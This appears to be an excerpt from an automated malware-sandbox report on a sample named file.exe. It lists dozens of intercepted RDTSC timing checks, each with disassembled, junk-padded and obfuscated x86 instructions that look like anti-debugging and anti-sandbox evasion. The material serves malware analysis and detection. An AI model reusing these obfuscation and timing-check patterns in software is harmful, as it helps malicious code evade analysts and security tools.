Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F40AD second address: 7F40BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5451FBBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F40BD second address: 7F40DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5A9C second address: 7F5AAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jnp 00007F8C5451FBBCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F76A9 second address: 7F76B3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C54522426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0D12 second address: 4CC0D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0D18 second address: 4CC0D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0D1C second address: 4CC0D53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F8C5451FC06h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F8C5451FBC0h 0x00000017 xor ax, AC38h 0x0000001c jmp 00007F8C5451FBBBh 0x00000021 popfd 0x00000022 mov dx, cx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0D53 second address: 4CC0DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522435h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add eax, ecx 0x0000000b pushad 0x0000000c mov eax, 3BDAEBF3h 0x00000011 mov eax, 5CAE544Fh 0x00000016 popad 0x00000017 mov eax, dword ptr [eax+00000860h] 0x0000001d jmp 00007F8C54522432h 0x00000022 test eax, eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F8C5452242Eh 0x0000002b or esi, 4E9BE828h 0x00000031 jmp 00007F8C5452242Bh 0x00000036 popfd 0x00000037 pushad 0x00000038 jmp 00007F8C54522436h 0x0000003d pushad 0x0000003e popad 0x0000003f popad 0x00000040 popad 0x00000041 je 00007F8CC52D83B4h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0DDD second address: 4CC0DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0DF0 second address: 4CC0E20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [eax+04h], 00000005h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8C5452242Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0E20 second address: 4CC0E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0E26 second address: 4CC0E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FF91C second address: 6FF920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE07B4 second address: 4CE07E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8C54522431h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx edx, si 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE07E4 second address: 4CE07E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0865 second address: 4CE087D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C54522434h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE087D second address: 4CE0881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0966 second address: 4CD096A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD096A second address: 4CD09BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 1Bh 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push ecx 0x0000000a call 00007F8C5451FBC1h 0x0000000f pop eax 0x00000010 pop edi 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 jmp 00007F8C5451FBC8h 0x00000019 xchg eax, ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8C5451FBC7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD09BC second address: 4CD09F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C5452242Bh 0x00000009 add ecx, 402326EEh 0x0000000f jmp 00007F8C54522439h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD09F5 second address: 4CD09F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD09F9 second address: 4CD09FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD09FD second address: 4CD0A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0A03 second address: 4CD0A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522435h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F8C5452242Eh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F8C5452242Eh 0x00000017 and eax, 0C34FBF8h 0x0000001d jmp 00007F8C5452242Bh 0x00000022 popfd 0x00000023 call 00007F8C54522438h 0x00000028 mov eax, 1D1343B1h 0x0000002d pop esi 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007F8C5452242Ch 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F8C5452242Ah 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0A89 second address: 4CD0A8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0A8F second address: 4CD0ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8C5452242Ch 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F8C5452242Bh 0x0000000f adc al, 0000007Eh 0x00000012 jmp 00007F8C54522439h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b lea eax, dword ptr [ebp-04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8C5452242Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0ADD second address: 4CD0B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F8C5451FBBEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov esi, ebx 0x00000013 mov edx, 116711F0h 0x00000018 popad 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov ecx, 2B7A4887h 0x00000022 pushfd 0x00000023 jmp 00007F8C5451FBBCh 0x00000028 xor cl, 00000038h 0x0000002b jmp 00007F8C5451FBBBh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0B31 second address: 4CD0B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C54522434h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0B49 second address: 4CD0B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0C39 second address: 4CD0C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0C3F second address: 4CD0C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0C43 second address: 4CD0266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a mov dh, cl 0x0000000c mov bl, 4Eh 0x0000000e popad 0x0000000f leave 0x00000010 pushad 0x00000011 push ecx 0x00000012 push edx 0x00000013 pop esi 0x00000014 pop edx 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 retn 0004h 0x0000001b nop 0x0000001c cmp eax, 00000000h 0x0000001f setne al 0x00000022 xor ebx, ebx 0x00000024 test al, 01h 0x00000026 jne 00007F8C54522427h 0x00000028 xor eax, eax 0x0000002a sub esp, 08h 0x0000002d mov dword ptr [esp], 00000000h 0x00000034 mov dword ptr [esp+04h], 00000000h 0x0000003c call 00007F8C58CC9EFCh 0x00000041 mov edi, edi 0x00000043 jmp 00007F8C54522436h 0x00000048 xchg eax, ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F8C5452242Ah 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0266 second address: 4CD0275 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0275 second address: 4CD02AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C54522433h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD02AA second address: 4CD02C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD02C7 second address: 4CD03C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C54522437h 0x00000009 and si, 4AFEh 0x0000000e jmp 00007F8C54522439h 0x00000013 popfd 0x00000014 mov ecx, 04D78B47h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e push eax 0x0000001f pushfd 0x00000020 jmp 00007F8C5452242Fh 0x00000025 adc esi, 79615D0Eh 0x0000002b jmp 00007F8C54522439h 0x00000030 popfd 0x00000031 pop esi 0x00000032 mov bx, 6E04h 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 jmp 00007F8C54522433h 0x0000003e push FFFFFFFEh 0x00000040 jmp 00007F8C54522436h 0x00000045 call 00007F8C54522429h 0x0000004a pushad 0x0000004b mov edx, eax 0x0000004d pushfd 0x0000004e jmp 00007F8C5452242Ah 0x00000053 jmp 00007F8C54522435h 0x00000058 popfd 0x00000059 popad 0x0000005a push eax 0x0000005b jmp 00007F8C54522431h 0x00000060 mov eax, dword ptr [esp+04h] 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F8C5452242Ch 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD03C1 second address: 4CD0420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e pushfd 0x0000000f jmp 00007F8C5451FBBBh 0x00000014 sub cx, CFEEh 0x00000019 jmp 00007F8C5451FBC9h 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 jmp 00007F8C5451FBC1h 0x00000029 pop eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov cx, di 0x00000030 push ebx 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0420 second address: 4CD0450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 45584905h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8C54522433h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0450 second address: 4CD0454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0454 second address: 4CD045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD045A second address: 4CD0469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5451FBBBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0469 second address: 4CD04C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 3050E26Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov dx, C61Eh 0x00000019 pushfd 0x0000001a jmp 00007F8C5452242Fh 0x0000001f sub si, F2CEh 0x00000024 jmp 00007F8C54522439h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD04C6 second address: 4CD04CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD04CB second address: 4CD053D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f pushad 0x00000010 push edx 0x00000011 movzx esi, bx 0x00000014 pop ebx 0x00000015 pushfd 0x00000016 jmp 00007F8C5452242Ah 0x0000001b jmp 00007F8C54522435h 0x00000020 popfd 0x00000021 popad 0x00000022 nop 0x00000023 jmp 00007F8C5452242Eh 0x00000028 push eax 0x00000029 pushad 0x0000002a mov dh, 92h 0x0000002c pushad 0x0000002d mov ebx, esi 0x0000002f mov dl, al 0x00000031 popad 0x00000032 popad 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jmp 00007F8C54522438h 0x0000003c mov cx, D681h 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD053D second address: 4CD0585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8C5451FBC7h 0x00000014 add ax, F65Eh 0x00000019 jmp 00007F8C5451FBC9h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0585 second address: 4CD05D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F8C54522436h 0x0000000f push eax 0x00000010 jmp 00007F8C5452242Bh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8C54522430h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD05D8 second address: 4CD05E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD070B second address: 4CD0745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522432h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor eax, ebp 0x0000000c jmp 00007F8C54522431h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8C5452242Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0745 second address: 4CD0755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5451FBBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0755 second address: 4CD07C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5452242Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8C54522439h 0x00000011 nop 0x00000012 jmp 00007F8C5452242Eh 0x00000017 lea eax, dword ptr [ebp-10h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F8C5452242Dh 0x00000023 sbb si, E7D6h 0x00000028 jmp 00007F8C54522431h 0x0000002d popfd 0x0000002e mov eax, 72864747h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD07C0 second address: 4CD07C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD07C5 second address: 4CD07CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD07CB second address: 4CD083C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr fs:[00000000h], eax 0x0000000d jmp 00007F8C5451FBC5h 0x00000012 mov dword ptr [ebp-18h], esp 0x00000015 pushad 0x00000016 mov di, si 0x00000019 mov bx, cx 0x0000001c popad 0x0000001d mov eax, dword ptr fs:[00000018h] 0x00000023 jmp 00007F8C5451FBC2h 0x00000028 mov ecx, dword ptr [eax+00000FDCh] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushfd 0x00000032 jmp 00007F8C5451FBBCh 0x00000037 jmp 00007F8C5451FBC5h 0x0000003c popfd 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD083C second address: 4CD0874 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, bx 0x00000009 popad 0x0000000a test ecx, ecx 0x0000000c jmp 00007F8C5452242Fh 0x00000011 jns 00007F8C54522478h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8C54522435h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0874 second address: 4CD087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD087A second address: 4CD087E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC019B second address: 4CC019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC019F second address: 4CC01A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC01A5 second address: 4CC021F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8C5451FBC0h 0x0000000f push eax 0x00000010 pushad 0x00000011 push edx 0x00000012 mov si, 5583h 0x00000016 pop esi 0x00000017 pushfd 0x00000018 jmp 00007F8C5451FBC9h 0x0000001d sbb ah, 00000006h 0x00000020 jmp 00007F8C5451FBC1h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 mov ecx, 7A9CB7AFh 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F8C5451FBC1h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC021F second address: 4CC0254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c jmp 00007F8C5452242Eh 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8C5452242Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0254 second address: 4CC0258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0258 second address: 4CC025E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC025E second address: 4CC02AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8C5451FBBCh 0x00000008 pop esi 0x00000009 jmp 00007F8C5451FBBBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F8C5451FBC9h 0x00000017 xchg eax, ebx 0x00000018 jmp 00007F8C5451FBBEh 0x0000001d xchg eax, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC02AC second address: 4CC02C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC02C9 second address: 4CC0342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8C5451FBC7h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e call 00007F8C5451FBBBh 0x00000013 push ecx 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F8C5451FBC5h 0x0000001c sub ax, 4806h 0x00000021 jmp 00007F8C5451FBC1h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8C5451FBC8h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0342 second address: 4CC0346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0346 second address: 4CC034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC034C second address: 4CC035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5452242Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0381 second address: 4CC03C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F8C5451FBC1h 0x00000010 sub edi, edi 0x00000012 jmp 00007F8C5451FBC7h 0x00000017 inc ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC03C8 second address: 4CC03CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC03CC second address: 4CC03D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC046D second address: 4CC047F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5452242Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC04CA second address: 4CC04D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
